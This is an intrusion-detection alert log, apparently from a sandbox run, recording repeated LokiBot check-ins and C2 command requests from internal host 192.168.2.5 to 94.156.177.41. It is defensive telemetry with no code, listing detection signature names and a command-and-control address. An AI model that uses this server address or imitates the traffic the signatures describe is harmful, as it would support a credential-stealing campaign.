2025-01-11T07:44:29.967134+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49713	94.156.177.41	80	TCP
2025-01-11T07:44:30.130805+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49714	94.156.177.41	80	TCP
2025-01-11T07:44:30.130805+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49714	94.156.177.41	80	TCP
2025-01-11T07:44:30.130805+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49714	94.156.177.41	80	TCP
2025-01-11T07:44:30.851513+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49714	94.156.177.41	80	TCP
2025-01-11T07:44:30.851513+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49714	94.156.177.41	80	TCP
2025-01-11T07:44:31.013403+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49715	94.156.177.41	80	TCP
2025-01-11T07:44:31.013403+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49715	94.156.177.41	80	TCP
2025-01-11T07:44:31.013403+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49715	94.156.177.41	80	TCP
2025-01-11T07:44:31.718507+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49715	94.156.177.41	80	TCP
2025-01-11T07:44:31.718507+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49715	94.156.177.41	80	TCP
2025-01-11T07:44:32.794115+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49716	94.156.177.41	80	TCP
2025-01-11T07:44:32.794115+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49716	94.156.177.41	80	TCP
2025-01-11T07:44:32.794115+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49716	94.156.177.41	80	TCP
2025-01-11T07:44:33.640345+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49716	94.156.177.41	80	TCP
2025-01-11T07:44:33.640345+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49716	94.156.177.41	80	TCP
2025-01-11T07:44:33.799410+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49717	94.156.177.41	80	TCP
2025-01-11T07:44:33.799410+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49717	94.156.177.41	80	TCP
2025-01-11T07:44:33.799410+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49717	94.156.177.41	80	TCP
2025-01-11T07:44:34.512627+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49717	94.156.177.41	80	TCP
2025-01-11T07:44:34.512627+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49717	94.156.177.41	80	TCP
2025-01-11T07:44:34.671202+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49718	94.156.177.41	80	TCP
2025-01-11T07:44:34.671202+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49718	94.156.177.41	80	TCP
2025-01-11T07:44:34.671202+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49718	94.156.177.41	80	TCP
2025-01-11T07:44:35.396140+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49718	94.156.177.41	80	TCP
2025-01-11T07:44:35.396140+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49718	94.156.177.41	80	TCP
2025-01-11T07:44:35.543288+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49719	94.156.177.41	80	TCP
2025-01-11T07:44:35.543288+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49719	94.156.177.41	80	TCP
2025-01-11T07:44:35.543288+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49719	94.156.177.41	80	TCP
2025-01-11T07:44:36.266782+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49719	94.156.177.41	80	TCP
2025-01-11T07:44:36.266782+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49719	94.156.177.41	80	TCP
2025-01-11T07:44:36.441284+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49720	94.156.177.41	80	TCP
2025-01-11T07:44:36.441284+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49720	94.156.177.41	80	TCP
2025-01-11T07:44:36.441284+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49720	94.156.177.41	80	TCP
2025-01-11T07:44:37.189451+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49720	94.156.177.41	80	TCP
2025-01-11T07:44:37.189451+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49720	94.156.177.41	80	TCP
2025-01-11T07:44:37.566875+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49721	94.156.177.41	80	TCP
2025-01-11T07:44:37.566875+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49721	94.156.177.41	80	TCP
2025-01-11T07:44:37.566875+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49721	94.156.177.41	80	TCP
2025-01-11T07:44:38.297474+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49721	94.156.177.41	80	TCP
2025-01-11T07:44:38.297474+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49721	94.156.177.41	80	TCP
2025-01-11T07:44:38.454563+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49722	94.156.177.41	80	TCP
2025-01-11T07:44:38.454563+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49722	94.156.177.41	80	TCP
2025-01-11T07:44:38.454563+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49722	94.156.177.41	80	TCP
2025-01-11T07:44:39.175539+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49722	94.156.177.41	80	TCP
2025-01-11T07:44:39.175539+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49722	94.156.177.41	80	TCP
2025-01-11T07:44:39.345173+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49724	94.156.177.41	80	TCP
2025-01-11T07:44:39.345173+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49724	94.156.177.41	80	TCP
2025-01-11T07:44:39.345173+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49724	94.156.177.41	80	TCP
2025-01-11T07:44:40.083235+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49724	94.156.177.41	80	TCP
2025-01-11T07:44:40.083235+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49724	94.156.177.41	80	TCP
2025-01-11T07:44:40.457078+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49725	94.156.177.41	80	TCP
2025-01-11T07:44:40.457078+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49725	94.156.177.41	80	TCP
2025-01-11T07:44:40.457078+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49725	94.156.177.41	80	TCP
2025-01-11T07:44:41.166479+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49725	94.156.177.41	80	TCP
2025-01-11T07:44:41.166479+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49725	94.156.177.41	80	TCP
2025-01-11T07:44:41.331671+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49730	94.156.177.41	80	TCP
2025-01-11T07:44:41.331671+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49730	94.156.177.41	80	TCP
2025-01-11T07:44:41.331671+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49730	94.156.177.41	80	TCP
2025-01-11T07:44:42.037120+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49730	94.156.177.41	80	TCP
2025-01-11T07:44:42.037120+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49730	94.156.177.41	80	TCP
2025-01-11T07:44:42.253637+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49738	94.156.177.41	80	TCP
2025-01-11T07:44:42.253637+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49738	94.156.177.41	80	TCP
2025-01-11T07:44:42.253637+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49738	94.156.177.41	80	TCP
2025-01-11T07:44:42.934004+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49738	94.156.177.41	80	TCP
2025-01-11T07:44:42.934004+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49738	94.156.177.41	80	TCP
2025-01-11T07:44:43.098513+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49743	94.156.177.41	80	TCP
2025-01-11T07:44:43.098513+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49743	94.156.177.41	80	TCP
2025-01-11T07:44:43.098513+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49743	94.156.177.41	80	TCP
2025-01-11T07:44:43.818626+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49743	94.156.177.41	80	TCP
2025-01-11T07:44:43.818626+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49743	94.156.177.41	80	TCP
2025-01-11T07:44:43.980050+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49749	94.156.177.41	80	TCP
2025-01-11T07:44:43.980050+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49749	94.156.177.41	80	TCP
2025-01-11T07:44:43.980050+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49749	94.156.177.41	80	TCP
2025-01-11T07:44:44.687247+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49749	94.156.177.41	80	TCP
2025-01-11T07:44:44.687247+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49749	94.156.177.41	80	TCP
2025-01-11T07:44:44.852549+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49755	94.156.177.41	80	TCP
2025-01-11T07:44:44.852549+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49755	94.156.177.41	80	TCP
2025-01-11T07:44:44.852549+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49755	94.156.177.41	80	TCP
2025-01-11T07:44:45.559460+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49755	94.156.177.41	80	TCP
2025-01-11T07:44:45.559460+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49755	94.156.177.41	80	TCP
2025-01-11T07:44:45.728633+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49761	94.156.177.41	80	TCP
2025-01-11T07:44:45.728633+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49761	94.156.177.41	80	TCP
2025-01-11T07:44:45.728633+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49761	94.156.177.41	80	TCP
2025-01-11T07:44:46.454393+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49761	94.156.177.41	80	TCP
2025-01-11T07:44:46.454393+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49761	94.156.177.41	80	TCP
2025-01-11T07:44:46.611946+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49771	94.156.177.41	80	TCP
2025-01-11T07:44:46.611946+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49771	94.156.177.41	80	TCP
2025-01-11T07:44:46.611946+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49771	94.156.177.41	80	TCP
2025-01-11T07:44:47.315113+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49771	94.156.177.41	80	TCP
2025-01-11T07:44:47.315113+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49771	94.156.177.41	80	TCP
2025-01-11T07:44:47.470301+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49777	94.156.177.41	80	TCP
2025-01-11T07:44:47.470301+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49777	94.156.177.41	80	TCP
2025-01-11T07:44:47.470301+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49777	94.156.177.41	80	TCP
2025-01-11T07:44:48.186037+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49777	94.156.177.41	80	TCP
2025-01-11T07:44:48.186037+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49777	94.156.177.41	80	TCP
2025-01-11T07:44:48.343700+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49784	94.156.177.41	80	TCP
2025-01-11T07:44:48.343700+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49784	94.156.177.41	80	TCP
2025-01-11T07:44:48.343700+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49784	94.156.177.41	80	TCP
2025-01-11T07:44:49.200455+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49784	94.156.177.41	80	TCP
2025-01-11T07:44:49.200455+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49784	94.156.177.41	80	TCP
2025-01-11T07:44:49.359567+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49790	94.156.177.41	80	TCP
2025-01-11T07:44:49.359567+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49790	94.156.177.41	80	TCP
2025-01-11T07:44:49.359567+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49790	94.156.177.41	80	TCP
2025-01-11T07:44:50.072387+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49790	94.156.177.41	80	TCP
2025-01-11T07:44:50.072387+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49790	94.156.177.41	80	TCP
2025-01-11T07:44:50.222647+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49796	94.156.177.41	80	TCP
2025-01-11T07:44:50.222647+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49796	94.156.177.41	80	TCP
2025-01-11T07:44:50.222647+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49796	94.156.177.41	80	TCP
2025-01-11T07:44:51.077306+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49796	94.156.177.41	80	TCP
2025-01-11T07:44:51.077306+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49796	94.156.177.41	80	TCP
2025-01-11T07:44:51.232327+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49804	94.156.177.41	80	TCP
2025-01-11T07:44:51.232327+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49804	94.156.177.41	80	TCP
2025-01-11T07:44:51.232327+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49804	94.156.177.41	80	TCP
2025-01-11T07:44:51.942413+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49804	94.156.177.41	80	TCP
2025-01-11T07:44:51.942413+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49804	94.156.177.41	80	TCP
2025-01-11T07:44:52.093577+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49811	94.156.177.41	80	TCP
2025-01-11T07:44:52.093577+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49811	94.156.177.41	80	TCP
2025-01-11T07:44:52.093577+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49811	94.156.177.41	80	TCP
2025-01-11T07:44:52.835032+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49811	94.156.177.41	80	TCP
2025-01-11T07:44:52.835032+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49811	94.156.177.41	80	TCP
2025-01-11T07:44:52.995437+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49816	94.156.177.41	80	TCP
2025-01-11T07:44:52.995437+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49816	94.156.177.41	80	TCP
2025-01-11T07:44:52.995437+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49816	94.156.177.41	80	TCP
2025-01-11T07:44:53.762221+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49816	94.156.177.41	80	TCP
2025-01-11T07:44:53.762221+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49816	94.156.177.41	80	TCP
2025-01-11T07:44:53.931455+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49821	94.156.177.41	80	TCP
2025-01-11T07:44:53.931455+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49821	94.156.177.41	80	TCP
2025-01-11T07:44:53.931455+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49821	94.156.177.41	80	TCP
2025-01-11T07:44:54.673111+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49821	94.156.177.41	80	TCP
2025-01-11T07:44:54.673111+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49821	94.156.177.41	80	TCP
2025-01-11T07:44:54.835228+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49826	94.156.177.41	80	TCP
2025-01-11T07:44:54.835228+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49826	94.156.177.41	80	TCP
2025-01-11T07:44:54.835228+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49826	94.156.177.41	80	TCP
2025-01-11T07:44:55.536663+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49826	94.156.177.41	80	TCP
2025-01-11T07:44:55.536663+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49826	94.156.177.41	80	TCP
2025-01-11T07:44:55.697158+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49834	94.156.177.41	80	TCP
2025-01-11T07:44:55.697158+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49834	94.156.177.41	80	TCP
2025-01-11T07:44:55.697158+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49834	94.156.177.41	80	TCP
2025-01-11T07:44:56.429080+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49834	94.156.177.41	80	TCP
2025-01-11T07:44:56.429080+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49834	94.156.177.41	80	TCP
2025-01-11T07:44:56.576534+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49840	94.156.177.41	80	TCP
2025-01-11T07:44:56.576534+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49840	94.156.177.41	80	TCP
2025-01-11T07:44:56.576534+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49840	94.156.177.41	80	TCP
2025-01-11T07:44:57.288262+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49840	94.156.177.41	80	TCP
2025-01-11T07:44:57.288262+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49840	94.156.177.41	80	TCP
2025-01-11T07:44:57.442816+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49849	94.156.177.41	80	TCP
2025-01-11T07:44:57.442816+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49849	94.156.177.41	80	TCP
2025-01-11T07:44:57.442816+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49849	94.156.177.41	80	TCP
2025-01-11T07:44:58.144593+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49849	94.156.177.41	80	TCP
2025-01-11T07:44:58.144593+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49849	94.156.177.41	80	TCP
2025-01-11T07:44:58.295544+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49855	94.156.177.41	80	TCP
2025-01-11T07:44:58.295544+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49855	94.156.177.41	80	TCP
2025-01-11T07:44:58.295544+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49855	94.156.177.41	80	TCP
2025-01-11T07:44:59.022080+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49855	94.156.177.41	80	TCP
2025-01-11T07:44:59.022080+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49855	94.156.177.41	80	TCP
2025-01-11T07:44:59.483479+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49862	94.156.177.41	80	TCP
2025-01-11T07:44:59.483479+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49862	94.156.177.41	80	TCP
2025-01-11T07:44:59.483479+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49862	94.156.177.41	80	TCP
2025-01-11T07:45:00.217467+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49862	94.156.177.41	80	TCP
2025-01-11T07:45:00.217467+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49862	94.156.177.41	80	TCP
2025-01-11T07:45:00.369812+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49869	94.156.177.41	80	TCP
2025-01-11T07:45:00.369812+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49869	94.156.177.41	80	TCP
2025-01-11T07:45:00.369812+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49869	94.156.177.41	80	TCP
2025-01-11T07:45:01.091724+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49869	94.156.177.41	80	TCP
2025-01-11T07:45:01.091724+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49869	94.156.177.41	80	TCP
2025-01-11T07:45:01.246794+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49878	94.156.177.41	80	TCP
2025-01-11T07:45:01.246794+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49878	94.156.177.41	80	TCP
2025-01-11T07:45:01.246794+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49878	94.156.177.41	80	TCP
2025-01-11T07:45:01.958700+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49878	94.156.177.41	80	TCP
2025-01-11T07:45:01.958700+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49878	94.156.177.41	80	TCP
2025-01-11T07:45:02.314357+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49884	94.156.177.41	80	TCP
2025-01-11T07:45:02.314357+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49884	94.156.177.41	80	TCP
2025-01-11T07:45:02.314357+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49884	94.156.177.41	80	TCP
2025-01-11T07:45:03.172234+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49884	94.156.177.41	80	TCP
2025-01-11T07:45:03.172234+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49884	94.156.177.41	80	TCP
2025-01-11T07:45:03.331453+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49891	94.156.177.41	80	TCP
2025-01-11T07:45:03.331453+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49891	94.156.177.41	80	TCP
2025-01-11T07:45:03.331453+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49891	94.156.177.41	80	TCP
2025-01-11T07:45:04.029029+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49891	94.156.177.41	80	TCP
2025-01-11T07:45:04.029029+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49891	94.156.177.41	80	TCP
2025-01-11T07:45:04.209206+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49899	94.156.177.41	80	TCP
2025-01-11T07:45:04.209206+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49899	94.156.177.41	80	TCP
2025-01-11T07:45:04.209206+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49899	94.156.177.41	80	TCP
2025-01-11T07:45:04.919494+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49899	94.156.177.41	80	TCP
2025-01-11T07:45:04.919494+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49899	94.156.177.41	80	TCP
2025-01-11T07:45:05.082273+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49905	94.156.177.41	80	TCP
2025-01-11T07:45:05.082273+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49905	94.156.177.41	80	TCP
2025-01-11T07:45:05.082273+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49905	94.156.177.41	80	TCP
2025-01-11T07:45:05.802703+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49905	94.156.177.41	80	TCP
2025-01-11T07:45:05.802703+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49905	94.156.177.41	80	TCP
2025-01-11T07:45:05.957442+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49911	94.156.177.41	80	TCP
2025-01-11T07:45:05.957442+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49911	94.156.177.41	80	TCP
2025-01-11T07:45:05.957442+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49911	94.156.177.41	80	TCP
2025-01-11T07:45:06.809719+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49911	94.156.177.41	80	TCP
2025-01-11T07:45:06.809719+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49911	94.156.177.41	80	TCP
2025-01-11T07:45:07.173718+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49919	94.156.177.41	80	TCP
2025-01-11T07:45:07.173718+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49919	94.156.177.41	80	TCP
2025-01-11T07:45:07.173718+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49919	94.156.177.41	80	TCP
2025-01-11T07:45:07.882275+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49919	94.156.177.41	80	TCP
2025-01-11T07:45:07.882275+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49919	94.156.177.41	80	TCP
2025-01-11T07:45:08.037685+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49928	94.156.177.41	80	TCP
